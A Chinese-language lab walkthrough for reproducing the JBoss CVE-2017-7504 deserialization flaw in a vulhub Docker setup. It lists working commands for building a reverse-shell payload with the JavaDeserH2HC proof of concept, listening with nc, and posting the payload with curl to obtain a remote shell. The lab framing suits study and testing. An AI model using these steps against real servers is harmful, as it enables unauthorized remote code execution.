一、漏洞描述
JBoss AS 4.x及之前版本中,JbossMQ實現過程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java檔案存在反序列化漏洞,遠端攻擊者可藉助特製的序列化資料利用該漏洞執行任意程式碼。
二、漏洞環境搭建
需要使用的工具如下
1.docker+vulhub漏洞庫
2.漏洞POC:下載連結https://github.com/joaomatosf/JavaDeserH2HC
3.攻擊機kali虛擬機器(版本隨意)
4.靶機Ubuntu18.04虛擬機器(其他也可以)
開啟Ubuntu虛擬機器,有docker環境和vulhub漏洞庫的話就直接進入環境,沒有的話先安裝docker和下載vulhub漏洞庫(網上教程很多,這裡就不多介紹了)
root@admin666-virtual-machine:~/vulhub-master/jboss/CVE-2017-7504#
執行命令
root@admin666-virtual-machine:~/vulhub-master/jboss/CVE-2017-7504# docker-compose up -d
等到出現以下頁面說明已經搭建完成
可以訪問http://your-ip:8080
,出現如下頁面證明環境搭建成功!
三、漏洞利用
進入kali利用漏洞POC進行驗證
1、先把POC克隆到kali中,執行命令
git clone https://github.com/joaomatosf/JavaDeserH2HC
2、進入JavaDeserH2HC目錄,執行
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
3、設定接收shell的IP和埠
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 攻擊機IP:監聽埠
4、使用nc監聽埠
nc -lvvp 監聽埠
5、用攻擊機傳送payload,在JavaDeserH2HC目錄下執行
curl http://192.168.1.17:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser
6、檢視監聽埠返回的shell,可以執行命令,至此漏洞驗證完成
7、關閉docker環境
docker-compose -down